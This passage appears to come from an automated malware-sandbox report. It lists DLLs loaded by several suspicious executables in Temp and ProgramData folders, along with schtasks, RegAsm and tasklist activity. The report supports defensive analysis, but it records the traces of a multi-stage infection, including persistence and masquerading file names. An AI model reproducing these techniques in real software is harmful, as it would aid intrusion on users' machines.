                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ntvdm64.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: mstask.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: mstask.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: dui70.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: duser.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: chartv.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: oleacc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: atlthunk.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: explorerframe.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: windows.fileexplorer.common.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: mscoree.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: apphelp.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: kernel.appcore.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: version.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: uxtheme.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: windows.storage.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: wldp.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: profapi.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: cryptsp.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: rsaenh.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: cryptbase.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: amsi.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: userenv.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: rasapi32.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: rasman.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: rtutils.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: mswsock.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: winhttp.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: iphlpapi.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: dhcpcsvc.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: dnsapi.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: winnsi.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: rasadhlp.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: fwpuclnt.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: secur32.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: sspicli.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: schannel.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: mskeyprotect.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: ntasn1.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: ncrypt.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: ncryptsslp.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: msasn1.dll
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ntvdm64.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ntvdm64.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: ntvdm64.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeSection loaded: icu.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeSection loaded: kernel.appcore.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: mscoree.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: apphelp.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: kernel.appcore.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: version.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: uxtheme.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: sspicli.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: cryptsp.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rsaenh.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: cryptbase.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: wbemcomn.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: amsi.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: userenv.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: profapi.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: windows.storage.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: wldp.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rasapi32.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rasman.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rtutils.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: mswsock.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: winhttp.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: iphlpapi.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: dhcpcsvc.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: dnsapi.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: winnsi.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: rasadhlp.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: fwpuclnt.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: propsys.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: edputil.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: urlmon.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: iertutil.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: srvcli.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: netutils.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: wintypes.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: appresolver.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: bcp47langs.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: slc.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: sppc.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dll
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\System32\conhost.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeAutomated click: OK
